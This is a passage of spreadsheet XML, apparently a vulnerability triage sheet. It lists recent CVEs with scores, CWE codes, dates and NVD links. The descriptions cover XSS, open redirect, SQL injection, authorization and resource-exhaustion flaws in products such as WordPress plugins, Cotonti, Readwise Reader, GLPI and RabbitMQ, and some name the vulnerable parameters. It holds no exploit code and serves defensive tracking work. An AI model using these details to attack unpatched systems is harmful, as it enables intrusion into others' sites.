          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97895</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100237</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S285" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in The Wikimedia Foundation Mediawiki - Thanks Extension allows Stored XSS.
This issue affects Mediawiki - Thanks Extension: from * before 1.43.10/1.45.5/1.46.1.</t>
        </is>
      </c>
      <c r="T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100237</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100521</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains a reflected cross-site scripting vulnerability in the search plugin highlight parameter that performs no HTML or JavaScript escaping. Attackers can craft malicious links with injected JavaScript in the highlight parameter that executes in the browser of any visitor who opens the link, including administrators.</t>
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100521</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100522</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K287" s="5" t="inlineStr"/>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains a reflected cross-site scripting vulnerability in message.php where the lng parameter is not properly escaped before output in the confirmation dialog. Unauthenticated attackers can craft malicious links with script payloads in the lng parameter to execute arbitrary JavaScript in victim browser sessions.</t>
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100522</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100523</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains an open redirect vulnerability in message.php that base64-decodes the redirect parameter without domain validation. Unauthenticated attackers can craft malicious links with encoded external URLs to redirect users to arbitrary sites via meta refresh tags for phishing attacks.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100523</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17577</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>The SSL Zen plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'uri' (and 'host') parameters in versions up to, and including, 4.7.42. The ssl_zen_messages::getMessages() function builds the 'token_missmatch' message using base64_decode(sanitize_text_field($_REQUEST['uri'])) and (optionally) base64_decode(sanitize_text_field($_REQUEST['host'])). sanitize_text_field() cannot strip HTML/JavaScript that is hidden inside a base64-encoded blob, and the resulting decoded raw HTML is echoed unescaped by showMessage() . This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17577</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18311</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr"/>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr"/>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S290" s="5" t="inlineStr">
        <is>
          <t>Readwise Reader for Android contains a cross-site scripting vulnerability due to missing HTML sanitization in its processing of imported document metadata. Attacker-controlled fields such as the author meta tag are inserted into a WebView via innerHTML, enabling stored XSS that executes on synced devices when the malicious document is opened.</t>
        </is>
      </c>
      <c r="T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18311</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18312</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K291" s="5" t="inlineStr"/>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q291" s="5" t="inlineStr"/>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S291" s="5" t="inlineStr">
        <is>
          <t>Readwise Reader for Android constructs URLs in its WebView using attacker-controlled metadata without proper encoding or escaping. The application interpolates untrusted values directly into URL strings and inserts them into the DOM via innerHTML. Because the interpolation occurs without HTML or JavaScript context encoding, a crafted metadata value can break out of the intended URL structure and inject script content. An attacker could supply a document containing malicious metadata that, once synchronized to an Android device and rendered in the Reader WebView, results in execution of injected script content, enabling stored cross-site scripting (XSS)</t>
        </is>
      </c>
      <c r="T291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18312</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18320</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q292" s="5" t="inlineStr"/>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S292" s="5" t="inlineStr">
        <is>
          <t>Readwise Reader for Android uses a sanitize-html configuration that permits all attributes on SVG and PATH elements due to a wildcard attribute rule. This configuration fails to remove script-capable attributes such as event handlers (e.g., 'onload', 'onerror'). An attacker could supply a document containing malicious SVG content that survives sanitization and executes script wher rendered in the Reader WebView, resulting in client-side cross-site scripting (XSS).</t>
        </is>
      </c>
      <c r="T292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18320</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78393</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K293" s="5" t="inlineStr"/>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q293" s="5" t="inlineStr"/>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S293" s="5" t="inlineStr">
        <is>
          <t>The Link Library WordPress plugin before 7.9.6 does not properly escape some parameters before outputting them in the addresses of links it generates on its front-end directory pages, leading to Reflected Cross-Site Scripting which could be used against any visitor, including logged-in administrators.</t>
        </is>
      </c>
      <c r="T293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78393</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78902</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr"/>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q294" s="5" t="inlineStr"/>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S294" s="5" t="inlineStr">
        <is>
          <t>Cross Site Scripting vulnerability in Netgate pfSense 26.03.1-RELEASE allows an attacker to execute arbitrary code via the pfBlockerNG package</t>
        </is>
      </c>
      <c r="T294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78902</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88996</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q295" s="5" t="inlineStr"/>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S295" s="5" t="inlineStr">
        <is>
          <t>The WPForms – AI Form Builder for WordPress – Contact Forms, Payment Forms, Survey Form, Quiz &amp; More plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'page_title' POST Parameter via {page_title} Smart Tag in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This is only exploitable on forms whose admin-authored confirmation message places the {page_title} Smart Tag inside an HTML attribute context.</t>
        </is>
      </c>
      <c r="T295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88996</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92212</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q296" s="5" t="inlineStr"/>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S296" s="5" t="inlineStr">
        <is>
          <t>The JetFormBuilder — Dynamic Blocks Form Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via 'jfb_xss' (URL Query Variable) Parameter via Calculated Field in all versions up to, and including, 3.6.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Exploitation requires the targeted page to host a form configured with both a URL Query Variable preset field and a Calculated Field that references it, which are standard plugin features.</t>
        </is>
      </c>
      <c r="T296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92212</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53627</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q297" s="5" t="inlineStr"/>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S297" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.0 until 11.0.8, a low-privileged authenticated user can use the new API (v2) to perform update operations that the same user is normally forbidden to perform through the user interface. The API update flow does not consistently enforce the applicable authorization checks. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53627</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54790</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q298" s="5" t="inlineStr"/>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S298" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane stores an administrator-controlled custom_field_table value without validating it against the allowed custom-field table names. Mdl_custom_fields::used() later concatenates that stored value into the FROM table and WHERE column identifier positions, so opening the custom-field edit form executes a second-order SQL injection. The injection can query arbitrary schema data and can cause application errors or denial of service. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54790</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66071</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q299" s="5" t="inlineStr"/>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S299" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15 and 4.0.22 and 4.1.11 and 4.2.6 and 4.3.1, Atom exhaustion: OAuth2 JWT tag: scope values. extractscopes/1 parses scopes of the form .tag: and calls rabbitdatacoercion:toatom() to convert to a tag atom. The token signature is verified first, so the attacker cannot forge scopes , but in IdP configurations where scope content is user-influenced, each login with a novel tag value leaks one In deployments where users can influence the scopes included in their IdP-issued JWT rabbitmqauthbackendoauth2 enabled IdP permits attacker-influenced scope values in signed tokens. This issue is fixed in versions 3.13.15 and 4.0.22 and 4.1.11 and 4.2.6 and 4.3.1.</t>
        </is>
      </c>
      <c r="T299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66071</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66073</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>6</v>
      </c>
